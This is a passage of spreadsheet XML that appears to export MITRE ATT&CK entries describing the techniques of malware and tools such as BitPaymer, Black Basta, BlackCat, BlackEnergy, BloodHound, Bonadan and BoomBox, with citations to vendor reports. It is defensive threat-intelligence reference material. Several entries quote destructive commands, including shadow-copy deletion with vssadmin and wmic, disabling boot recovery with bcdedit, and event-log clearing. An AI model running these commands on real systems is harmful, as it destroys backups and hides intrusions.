    <t xml:space="preserve">[BitPaymer](https://attack.mitre.org/software/S0570) can use the RegEnumKeyW to iterate through Registry keys.(Citation: Crowdstrike Indrik November 2018) </t>
  </si>
  <si>
    <t>relationship--7d71658b-2b9f-4639-9fe7-7c7924b52ff7</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) has set the run key &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; for persistence.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>relationship--5ec68d1c-9ba8-4f9c-b185-f4e8482a66b2</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) can use &lt;code&gt;net view&lt;/code&gt; to discover remote systems.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>relationship--0c8370b1-efd1-4e5d-86c9-d3ffba1bb22d</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) can enumerate existing Windows services on the host that are configured to run as LocalSystem.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>relationship--d0162247-12e2-4c0e-8efe-d5c4823e0fcd</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) can modify the timestamp of an executable so that it can be identified and restored by the decryption tool.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>relationship--5793708d-b25a-4276-9b0b-697a8494e0f8</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) can use the tokens of users to create processes on infected systems.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>relationship--6edd6f1b-3907-4013-b2e0-ceb03ccf427a</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) can use &lt;code&gt;icacls /reset&lt;/code&gt; and &lt;code&gt;takeown /F&lt;/code&gt; to reset a targeted executable's permissions and then take ownership.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>relationship--3dbc782c-2030-4b32-9bf7-36c65bc9e749</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) has attempted to install itself as a service to maintain persistence.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>relationship--8ddf6a79-a4ff-4229-9923-bec8fe120ceb</t>
  </si>
  <si>
    <t>S1070</t>
  </si>
  <si>
    <t>Black Basta</t>
  </si>
  <si>
    <t>malware--8d242fb4-9033-4f13-8a88-4b9b4bcd9a53</t>
  </si>
  <si>
    <t>[Black Basta](https://attack.mitre.org/software/S1070) had added data prior to the Portable Executable (PE) header to prevent automatic scanners from identifying the payload.(Citation: Check Point Black Basta October 2022)</t>
  </si>
  <si>
    <t>relationship--be0b4e47-a6af-43f1-9f7c-b15cffedc290</t>
  </si>
  <si>
    <t>The [Black Basta](https://attack.mitre.org/software/S1070) dropper has been digitally signed with a certificate issued by Akeo Consulting for legitimate executables used for creating bootable USB drives.(Citation: Check Point Black Basta October 2022)</t>
  </si>
  <si>
    <t>relationship--26e2d87c-43c2-4552-9186-2ca0f70e96c7</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</si>
  <si>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</si>
  <si>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relationship--6aedddc0-0c82-48f0-b9cc-071d440a367c</t>
  </si>
  <si>
    <t>The [Black Basta](https://attack.mitre.org/software/S1070) dropper can check system flags, CPU registers, CPU instructions, process timing, system libraries, and APIs to determine if a debugger is present.(Citation: Check Point Black Basta October 2022)</t>
  </si>
  <si>
    <t>relationship--6bc08584-0dc8-494f-967f-50adc9464843</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</si>
  <si>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</si>
  <si>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relationship--66e7e1f3-5113-407f-a07a-299c4b9b68e2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</si>
  <si>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</si>
  <si>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relationship--0260e86a-488e-4307-a467-2ccabf430212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</si>
  <si>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</si>
  <si>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relationship--314719c9-a946-4630-a09c-d416b48f4c21</t>
  </si>
  <si>
    <t>The [Black Basta](https://attack.mitre.org/software/S1070) binary can use `chmod` to gain full permissions to targeted files.(Citation: Uptycs Black Basta ESXi June 2022)</t>
  </si>
  <si>
    <t>relationship--8097b8e6-73f2-44f4-9234-dffa4794e0c6</t>
  </si>
  <si>
    <t>[Black Basta](https://attack.mitre.org/software/S1070) has been downloaded and executed from malicious Excel files.(Citation: Trend Micro Black Basta May 2022)(Citation: Trend Micro Black Basta Spotlight September 2022)</t>
  </si>
  <si>
    <t>relationship--7423b6a3-9956-49ea-ba11-3a678994352c</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</si>
  <si>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</si>
  <si>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relationship--fe18ff64-8ea8-4e21-97b5-5c46a57a39d9</t>
  </si>
  <si>
    <t>The [Black Basta](https://attack.mitre.org/software/S1070) dropper has mimicked an application for creating USB bootable drivers.(Citation: Check Point Black Basta October 2022)</t>
  </si>
  <si>
    <t>relationship--d8b43377-366c-42c6-a4d2-ddcfd1228bbf</t>
  </si>
  <si>
    <t>08 April 2023</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</si>
  <si>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</si>
  <si>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relationship--5abf323d-03be-4996-ab4b-89317883d0ab</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</si>
  <si>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</si>
  <si>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relationship--d10cea20-846f-4c55-9566-cd7367ae6488</t>
  </si>
  <si>
    <t>[Black Basta](https://attack.mitre.org/software/S1070) has used PowerShell scripts for discovery and to execute files over the network.(Citation: Trend Micro Black Basta May 2022)(Citation: Trend Micro Black Basta Spotlight September 2022)(Citation: NCC Group Black Basta June 2022)</t>
  </si>
  <si>
    <t>relationship--9284080a-98cb-46d7-80b3-775a89d5bdfa</t>
  </si>
  <si>
    <t>[Black Basta](https://attack.mitre.org/software/S1070) can use LDAP queries to connect to AD and iterate over connected workstations.(Citation: Check Point Black Basta October 2022)</t>
  </si>
  <si>
    <t>relationship--3341a11e-acd1-4cba-a7a9-5bb48aec8bec</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</si>
  <si>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</si>
  <si>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relationship--11cd38e9-397d-4bc9-a045-1401e5e9156e</t>
  </si>
  <si>
    <t>[Black Basta](https://attack.mitre.org/software/S1070) can check system flags and libraries, process timing, and API's to detect code emulation or sandboxing.(Citation: Palo Alto Networks Black Basta August 2022)(Citation: Check Point Black Basta October 2022)</t>
  </si>
  <si>
    <t>relationship--9122a590-4a01-4f41-a15a-bc3bc92b0439</t>
  </si>
  <si>
    <t>[Black Basta](https://attack.mitre.org/software/S1070) can enumerate volumes and collect system boot configuration and CPU information.(Citation: Minerva Labs Black Basta May 2022)(Citation: Cyble Black Basta May 2022)</t>
  </si>
  <si>
    <t>relationship--0e714323-a3b6-4848-852c-5e35608d0970</t>
  </si>
  <si>
    <t>[Black Basta](https://attack.mitre.org/software/S1070) can check whether the service name FAX is present.(Citation: Cyble Black Basta May 2022)</t>
  </si>
  <si>
    <t>relationship--8b02a707-94ba-4c61-8292-d9dce02606b3</t>
  </si>
  <si>
    <t>[Black Basta](https://attack.mitre.org/software/S1070) can make a random number of calls to the `kernel32.beep` function to hinder log analysis.(Citation: Check Point Black Basta October 2022)</t>
  </si>
  <si>
    <t>relationship--2f5dca6b-3cd3-4b2a-b097-7eddd80bc366</t>
  </si>
  <si>
    <t>[Black Basta](https://attack.mitre.org/software/S1070) can use `cmd.exe` to enable shadow copy deletion.(Citation: Deep Instinct Black Basta August 2022)</t>
  </si>
  <si>
    <t>relationship--856dc5fd-84ee-41e0-b463-0ba54f98141c</t>
  </si>
  <si>
    <t>[Black Basta](https://attack.mitre.org/software/S1070) has used WMI to execute files over the network.(Citation: NCC Group Black Basta June 2022)</t>
  </si>
  <si>
    <t>relationship--ab5f4ee8-c7fc-4be4-bb39-0536d7d7eba3</t>
  </si>
  <si>
    <t>[Black Basta](https://attack.mitre.org/software/S1070) can create a new service to establish persistence.(Citation: Minerva Labs Black Basta May 2022)(Citation: Avertium Black Basta June 2022)</t>
  </si>
  <si>
    <t>relationship--a508c28d-76f7-4277-a9d2-5936f9d86e43</t>
  </si>
  <si>
    <t>S1068</t>
  </si>
  <si>
    <t>BlackCat</t>
  </si>
  <si>
    <t>malware--50c44c34-3abb-48ae-9433-a2337de5b0bc</t>
  </si>
  <si>
    <t>[BlackCat](https://attack.mitre.org/software/S1068) has the ability modify access tokens.(Citation: Microsoft BlackCat Jun 2022)(Citation: Sophos BlackCat Jul 2022)</t>
  </si>
  <si>
    <t>relationship--fe3bcb4a-bb14-4068-a9d3-be2f68137f51</t>
  </si>
  <si>
    <t>02 March 2023</t>
  </si>
  <si>
    <t xml:space="preserve">[BlackCat](https://attack.mitre.org/software/S1068) can bypass UAC to escalate privileges.(Citation: Microsoft BlackCat Jun 2022) </t>
  </si>
  <si>
    <t>relationship--4558c2f3-247f-478c-8139-80e7a45208e7</t>
  </si>
  <si>
    <t>[BlackCat](https://attack.mitre.org/software/S1068) can clear Windows event logs using `wevtutil.exe`.(Citation: Microsoft BlackCat Jun 2022)</t>
  </si>
  <si>
    <t>relationship--716cdd64-44c3-433d-a5eb-7934b6ea713e</t>
  </si>
  <si>
    <t>[BlackCat](https://attack.mitre.org/software/S1068) has the ability to encrypt Windows devices, Linux devices, and VMWare instances.(Citation: Microsoft BlackCat Jun 2022)</t>
  </si>
  <si>
    <t>relationship--29cec373-a87c-444b-b192-9ab94f69a008</t>
  </si>
  <si>
    <t>[BlackCat](https://attack.mitre.org/software/S1068) has the ability to wipe VM snapshots on compromised networks.(Citation: Microsoft BlackCat Jun 2022)(Citation: Sophos BlackCat Jul 2022)</t>
  </si>
  <si>
    <t>relationship--d9af5e2e-3ac5-451a-bc63-c3e26ca6371e</t>
  </si>
  <si>
    <t>[BlackCat](https://attack.mitre.org/software/S1068) can utilize `net use` commands to identify domain users.(Citation: Microsoft BlackCat Jun 2022)</t>
  </si>
  <si>
    <t>relationship--4e0775fd-17b6-44cd-9598-98f1a185b32b</t>
  </si>
  <si>
    <t>[BlackCat](https://attack.mitre.org/software/S1068) can determine if a user on a compromised host has domain admin privileges.(Citation: Microsoft BlackCat Jun 2022)</t>
  </si>
  <si>
    <t>relationship--7114f449-1436-41ca-ab9e-5704bf3552ef</t>
  </si>
  <si>
    <t>[BlackCat](https://attack.mitre.org/software/S1068) can enumerate files for encryption.(Citation: Microsoft BlackCat Jun 2022)</t>
  </si>
  <si>
    <t>relationship--f6fe7167-0788-4062-9f59-d8ee8398db15</t>
  </si>
  <si>
    <t>[BlackCat](https://attack.mitre.org/software/S1068) can delete shadow copies using `vssadmin.exe delete shadows /all /quiet` and `wmic.exe Shadowcopy Delete`; it can also modify the boot loader using `bcdedit /set {default} recoveryenabled No`.(Citation: Microsoft BlackCat Jun 2022)</t>
  </si>
  <si>
    <t>relationship--fc3e0e8c-d6d3-4f2d-8374-86b7902079a9</t>
  </si>
  <si>
    <t>[BlackCat](https://attack.mitre.org/software/S1068) can change the desktop wallpaper on compromised hosts.(Citation: Microsoft BlackCat Jun 2022)(Citation: Sophos BlackCat Jul 2022)</t>
  </si>
  <si>
    <t>relationship--bec3259a-58d3-44a5-95c7-c8eb16427e85</t>
  </si>
  <si>
    <t>[BlackCat](https://attack.mitre.org/software/S1068) can replicate itself across connected servers via `psexec`.(Citation: Microsoft BlackCat Jun 2022)</t>
  </si>
  <si>
    <t>relationship--0bca4956-d4c5-4149-a493-c0596701dd9a</t>
  </si>
  <si>
    <t>[BlackCat](https://attack.mitre.org/software/S1068) has the ability to add the following registry key on compromised networks to maintain persistence: `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services \LanmanServer\Paramenters`(Citation: Microsoft BlackCat Jun 2022)</t>
  </si>
  <si>
    <t>relationship--552afd93-370d-4f8e-b2c0-e27d9d7e050e</t>
  </si>
  <si>
    <t>[BlackCat](https://attack.mitre.org/software/S1068) has the ability to discover network shares on compromised networks.(Citation: Microsoft BlackCat Jun 2022)(Citation: Sophos BlackCat Jul 2022)</t>
  </si>
  <si>
    <t>relationship--9cd85648-3618-4817-a178-d36d7c40631c</t>
  </si>
  <si>
    <t>[BlackCat](https://attack.mitre.org/software/S1068) can broadcasts NetBIOS Name Service (NBNC) messages to search for servers connected to compromised networks.(Citation: Microsoft BlackCat Jun 2022)</t>
  </si>
  <si>
    <t>relationship--25b8605b-9ab2-418f-b92b-abb2be815b90</t>
  </si>
  <si>
    <t>[BlackCat](https://attack.mitre.org/software/S1068) has the ability to stop VM services on compromised networks.(Citation: Microsoft BlackCat Jun 2022)(Citation: Sophos BlackCat Jul 2022)</t>
  </si>
  <si>
    <t>relationship--2ee6e8e6-914a-4639-88cc-39c01de5d541</t>
  </si>
  <si>
    <t>[BlackCat](https://attack.mitre.org/software/S1068) can obtain the computer name and UUID, and enumerate local drives.(Citation: Microsoft BlackCat Jun 2022)</t>
  </si>
  <si>
    <t>relationship--3ca38ed9-3691-461d-81a1-1ad8de5817bb</t>
  </si>
  <si>
    <t>[BlackCat](https://attack.mitre.org/software/S1068) can utilize `net use` commands to discover the user name on a compromised host.(Citation: Microsoft BlackCat Jun 2022)</t>
  </si>
  <si>
    <t>relationship--f8c2b8e1-7439-48df-a8c3-6796fd4bb142</t>
  </si>
  <si>
    <t>[BlackCat](https://attack.mitre.org/software/S1068) can execute commands on a compromised network with the use of `cmd.exe`.(Citation: Microsoft BlackCat Jun 2022)</t>
  </si>
  <si>
    <t>relationship--e58bc387-6540-4976-8c12-73ddf15084ed</t>
  </si>
  <si>
    <t>[BlackCat](https://attack.mitre.org/software/S1068) can use Windows commands such as `fsutil behavior set SymLinkEvaluation R2L:1` to redirect file system access to a different location after gaining access into compromised networks.(Citation: Microsoft BlackCat Jun 2022)</t>
  </si>
  <si>
    <t>relationship--a3fc552f-e16d-4db7-8bca-d1c273b401f9</t>
  </si>
  <si>
    <t>[BlackCat](https://attack.mitre.org/software/S1068) can use `wmic.exe` to delete shadow copies on compromised networks.(Citation: Microsoft BlackCat Jun 2022)</t>
  </si>
  <si>
    <t>relationship--737af098-bd8c-4449-b93d-adaaaa55abea</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) attempts to bypass default User Access Control (UAC) settings by exploiting a backward-compatibility setting found in Windows 7 and later.(Citation: F-Secure BlackEnergy 2014)</t>
  </si>
  <si>
    <t>relationship--054a22c3-f0ee-476a-b0cb-e3277c755032</t>
  </si>
  <si>
    <t>02 June 2020</t>
  </si>
  <si>
    <t>The [BlackEnergy](https://attack.mitre.org/software/S0089) component KillDisk is capable of deleting Windows Event Logs.(Citation: ESEST Black Energy Jan 2016)</t>
  </si>
  <si>
    <t>relationship--c9dca829-6417-4121-9462-650ac852b8c2</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has enabled the &lt;code&gt;TESTSIGNING&lt;/code&gt; boot configuration option to facilitate loading of a driver component.(Citation: F-Secure BlackEnergy 2014)</t>
  </si>
  <si>
    <t>relationship--2856e2ad-4fcd-483a-85bb-99fe8304ee8d</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</si>
  <si>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</si>
  <si>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relationship--aec49e52-c54e-45be-a476-70aa0dc42cfb</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has used a plug-in to gather credentials from web browsers including FireFox, Google Chrome, and Internet Explorer.(Citation: F-Secure BlackEnergy 2014)(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>relationship--0d4d7376-5bda-44bc-b90d-0a065bb99433</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) 2 contains a "Destroy" plug-in that destroys data stored on victim hard drives by overwriting file contents.(Citation: Securelist BlackEnergy Feb 2015)(Citation: ESET BlackEnergy Jan 2016)</t>
  </si>
  <si>
    <t>relationship--d5166d3e-246b-473c-9ff0-c5cc97dd91de</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) injects its DLL component into svchost.exe.(Citation: F-Secure BlackEnergy 2014)</t>
  </si>
  <si>
    <t>relationship--1a7d1db3-9383-4171-8938-382e9b0375c6</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has the capability to communicate over a backup channel via plus.google.com.(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>relationship--f5936bbd-f8cb-404a-bd43-87f7bc836294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</si>
  <si>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</si>
  <si>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relationship--37f94533-8fbe-48d2-bf4f-f825ad75ff98</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</si>
  <si>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</si>
  <si>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relationship--12c761e7-f026-4e14-80fb-da9f4cb0ca38</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has run a keylogger plug-in on a victim.(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>relationship--bbd9b8d7-431c-44fa-95ac-61f73271ae92</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has conducted port scans on a host.(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>relationship--47e4d006-2685-4628-a46b-f6d9066f3585</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) can gather very specific information about attached USB devices, to include device instance ID and drive geometry.(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>relationship--7cac6ccb-d070-47da-8ebf-4034b0fddb7c</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has gathered a process list by using [Tasklist](https://attack.mitre.org/software/S0057).exe.(Citation: F-Secure BlackEnergy 2014)(Citation: Securelist BlackEnergy Nov 2014)(Citation: ESET BlackEnergy Jan 2016)</t>
  </si>
  <si>
    <t>relationship--2c586158-d02b-468a-bee8-04e1bde320e1</t>
  </si>
  <si>
    <t>The [BlackEnergy](https://attack.mitre.org/software/S0089) 3 variant drops its main DLL component and then creates a .lnk shortcut to that file in the startup folder.(Citation: F-Secure BlackEnergy 2014)</t>
  </si>
  <si>
    <t>relationship--cd2a7854-1339-4f40-8ba1-be032dc5249e</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has run a plug-in on a victim to spread through the local network by using [PsExec](https://attack.mitre.org/software/S0029) and accessing admin shares.(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>relationship--53d7b242-3ed6-4281-9829-e25d425e28fe</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) is capable of taking screenshots.(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>relationship--147d2e66-25de-42ea-8592-eb51333f595c</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</si>
  <si>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</si>
  <si>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relationship--da1a5240-bbd7-4e91-9dee-9b14df6cffe2</t>
  </si>
  <si>
    <t>relationship--8200c438-ec29-4f0e-81c3-9a058c735748</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</si>
  <si>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</si>
  <si>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relationship--efa98949-4b58-4407-8fa2-366c06dc2ed9</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</si>
  <si>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</si>
  <si>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relationship--de168dd4-3c59-4fa4-901a-911b1ee81a31</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has gathered information about local network connections using [netstat](https://attack.mitre.org/software/S0104).(Citation: F-Secure BlackEnergy 2014)(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>relationship--5b2c87e3-8eac-48b3-832b-2290b367403d</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) communicates with its C2 server over HTTP.(Citation: F-Secure BlackEnergy 2014)</t>
  </si>
  <si>
    <t>relationship--f5a175ba-ed26-44f8-9828-c2aa0e1f7d86</t>
  </si>
  <si>
    <t>A [BlackEnergy](https://attack.mitre.org/software/S0089) 2 plug-in uses WMI to gather victim host details.(Citation: Securelist BlackEnergy Feb 2015)</t>
  </si>
  <si>
    <t>relationship--0c0b4142-96e7-440b-a01f-f2bda05649b1</t>
  </si>
  <si>
    <t>One variant of [BlackEnergy](https://attack.mitre.org/software/S0089) creates a new service using either a hard-coded or randomly generated name.(Citation: F-Secure BlackEnergy 2014)</t>
  </si>
  <si>
    <t>relationship--c48f6a1b-1599-4e82-a7b6-1f7b5186e99e</t>
  </si>
  <si>
    <t>[BlackMould](https://attack.mitre.org/software/S0564) can copy files on a compromised host.(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>relationship--5d52eebf-0bd6-4088-8627-5dfb88f9b551</t>
  </si>
  <si>
    <t>[BlackMould](https://attack.mitre.org/software/S0564) has the ability to find files on the targeted system.(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>relationship--95801883-3fa4-4385-a48f-4a92dd8e1e09</t>
  </si>
  <si>
    <t>[BlackMould](https://attack.mitre.org/software/S0564) has the ability to download files to the victim's machine.(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>relationship--ba8145fd-61d3-4729-a7c8-96216d2e6078</t>
  </si>
  <si>
    <t>[BlackMould](https://attack.mitre.org/software/S0564) can enumerate local drives on a compromised host.(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>relationship--11917102-46c9-4c12-964c-065ad6b2a14f</t>
  </si>
  <si>
    <t>[BlackMould](https://attack.mitre.org/software/S0564) can send commands to C2 in the body of HTTP POST requests.(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>relationship--2d72a376-5bfb-4e6b-a79f-2f75f97de99e</t>
  </si>
  <si>
    <t>[BlackMould](https://attack.mitre.org/software/S0564) can run cmd.exe with parameters.(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>relationship--209fe032-42b5-4268-85bf-4db099e06d92</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) can compress data collected by its SharpHound ingestor into a ZIP file to be written to disk.(Citation: GitHub Bloodhound)(Citation: Trend Micro Black Basta October 2022)</t>
  </si>
  <si>
    <t>relationship--2762485e-c8a2-4bbe-b3d8-8b20ca70197b</t>
  </si>
  <si>
    <t>16 February 2023</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) can collect information about domain users, including identification of domain admin accounts.(Citation: CrowdStrike BloodHound April 2018)</t>
  </si>
  <si>
    <t>relationship--4e2594cc-f6e0-4153-b878-930bc03fc0ad</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) can collect information about domain groups and members.(Citation: CrowdStrike BloodHound April 2018)</t>
  </si>
  <si>
    <t>relationship--1280542b-4574-4567-ad3d-76692271699e</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) has the ability to map domain trusts and identify misconfigurations for potential abuse.(Citation: CrowdStrike BloodHound April 2018)</t>
  </si>
  <si>
    <t>relationship--a79a17c4-02d1-463f-ac0a-d62b20d10b2f</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) has the ability to collect local admin information via GPO.(Citation: GitHub Bloodhound)</t>
  </si>
  <si>
    <t>relationship--14debfee-3a2d-4184-8f2a-bc07977ce909</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) can identify users with local administrator rights.(Citation: CrowdStrike BloodHound April 2018)</t>
  </si>
  <si>
    <t>relationship--63895b27-aeba-4001-8039-b7b1bc41f8fc</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) can collect information about local groups and members.(Citation: CrowdStrike BloodHound April 2018)</t>
  </si>
  <si>
    <t>relationship--42a87d45-8dd1-4767-a6a2-d7bd19d3b0ef</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) can use .NET API calls in the SharpHound ingestor component to pull Active Directory data.(Citation: GitHub Bloodhound)</t>
  </si>
  <si>
    <t>relationship--8d512a95-702d-4670-ab33-069552494102</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) can collect password policy information on the target environment.(Citation: CrowdStrike BloodHound April 2018)</t>
  </si>
  <si>
    <t>relationship--2db515e9-4e44-4a49-917a-3108395b8590</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) can use PowerShell to pull Active Directory information from the target environment.(Citation: CrowdStrike BloodHound April 2018)</t>
  </si>
  <si>
    <t>relationship--a62885f2-38a3-4030-b28d-bff5b3d692df</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) can enumerate and collect the properties of domain computers, including domain controllers.(Citation: CrowdStrike BloodHound April 2018)</t>
  </si>
  <si>
    <t>relationship--841f6044-8c12-4063-b911-d1da4c8d6fdc</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) can collect information on user sessions.(Citation: CrowdStrike BloodHound April 2018)</t>
  </si>
  <si>
    <t>relationship--73717937-3d8f-402d-a222-b40d15a49cea</t>
  </si>
  <si>
    <t>S0486</t>
  </si>
  <si>
    <t>Bonadan</t>
  </si>
  <si>
    <t>malware--4c6d62c2-89f5-4159-8fab-0190b1f9d328</t>
  </si>
  <si>
    <t xml:space="preserve">[Bonadan](https://attack.mitre.org/software/S0486) can create bind and reverse shells on the infected system.(Citation: ESET ForSSHe December 2018)	</t>
  </si>
  <si>
    <t>relationship--f56f953d-7df2-4eee-93b6-f2c8377153bb</t>
  </si>
  <si>
    <t>23 July 2020</t>
  </si>
  <si>
    <t>[Bonadan](https://attack.mitre.org/software/S0486) has maliciously altered the OpenSSH binary on targeted systems to create a backdoor.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>relationship--bc40c6be-575a-4eb9-981f-fa6c127d2286</t>
  </si>
  <si>
    <t>16 July 2020</t>
  </si>
  <si>
    <t>[Bonadan](https://attack.mitre.org/software/S0486) can download additional modules from the C2 server.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>relationship--db2b0471-38e9-4c50-bf96-1c498f38223c</t>
  </si>
  <si>
    <t>[Bonadan](https://attack.mitre.org/software/S0486) can use the &lt;code&gt;ps&lt;/code&gt; command to discover other cryptocurrency miners active on the system.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>relationship--f6030347-c316-4c5c-b7ce-84c39aa09f85</t>
  </si>
  <si>
    <t>[Bonadan](https://attack.mitre.org/software/S0486) can download an additional module which has a cryptocurrency mining extension.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>relationship--6c0d9758-34f0-49b4-ad12-91329b4398e2</t>
  </si>
  <si>
    <t>[Bonadan](https://attack.mitre.org/software/S0486) can XOR-encrypt C2 communications.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>relationship--336e0a87-8ee2-420d-8fb8-10ea2c015723</t>
  </si>
  <si>
    <t>[Bonadan](https://attack.mitre.org/software/S0486) has discovered the OS version, CPU model, and RAM size of the system it has been installed on.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>relationship--34775b6e-f7dd-4b0f-bbb4-c696bfbda1c2</t>
  </si>
  <si>
    <t>[Bonadan](https://attack.mitre.org/software/S0486) can find the external IP address of the infected host.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>relationship--5239c6fe-bb67-48c0-bd77-2267e1e71cf3</t>
  </si>
  <si>
    <t>[Bonadan](https://attack.mitre.org/software/S0486) has discovered the username of the user running the backdoor.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>relationship--db5506f9-9451-471f-bb68-845c281be09c</t>
  </si>
  <si>
    <t>[BoomBox](https://attack.mitre.org/software/S0635) can decrypt AES-encrypted files downloaded from C2.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>relationship--353dd407-0850-4bc4-a447-cd1b708b3833</t>
  </si>
  <si>
    <t>03 August 2021</t>
  </si>
  <si>
    <t>[BoomBox](https://attack.mitre.org/software/S0635) has the ability to execute an LDAP query to enumerate the distinguished name, SAM account name, and display name for all domain users.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>relationship--362e332d-7763-488d-b25d-f12965f56d62</t>
  </si>
  <si>
    <t>[BoomBox](https://attack.mitre.org/software/S0635) can execute an LDAP query to discover e-mail accounts for domain users.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>relationship--f9b023e8-5a77-4b2d-a4b3-30a0d66b9956</t>
  </si>
  <si>
    <t>[BoomBox](https://attack.mitre.org/software/S0635) can check its current working directory and for the presence of a specific file and terminate if specific values are not found.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>relationship--8ece1131-5221-498b-9370-30b3b459203e</t>
  </si>
  <si>
    <t>[BoomBox](https://attack.mitre.org/software/S0635) can upload data to dedicated per-victim folders in Dropbox.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>relationship--f1c96864-f698-44a7-924e-98203b97c8db</t>
  </si>
  <si>
    <t>[BoomBox](https://attack.mitre.org/software/S0635) can search for specific files and directories on a machine.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>relationship--7d72dfaf-3ba5-4420-985c-b0cd16716428</t>
  </si>
  <si>
    <t>[BoomBox](https://attack.mitre.org/software/S0635) has the ability to download next stage malware components to a compromised system.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>relationship--33eb06fa-5983-47d8-9f7f-d594f311a008</t>
  </si>
  <si>
    <t>[BoomBox](https://attack.mitre.org/software/S0635) has gained execution through user interaction with a malicious file.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>relationship--4baffcd6-9cdc-4f1e-9b54-4084e7dc2c42</t>
  </si>
  <si>
    <t>[BoomBox](https://attack.mitre.org/software/S0635) has the ability to mask malicious data strings as PDF files.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>relationship--84be9d61-ec20-4066-8c99-b99d9127fce2</t>
  </si>
  <si>
    <t>[BoomBox](https://attack.mitre.org/software/S0635) can encrypt data using AES prior to exfiltration.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
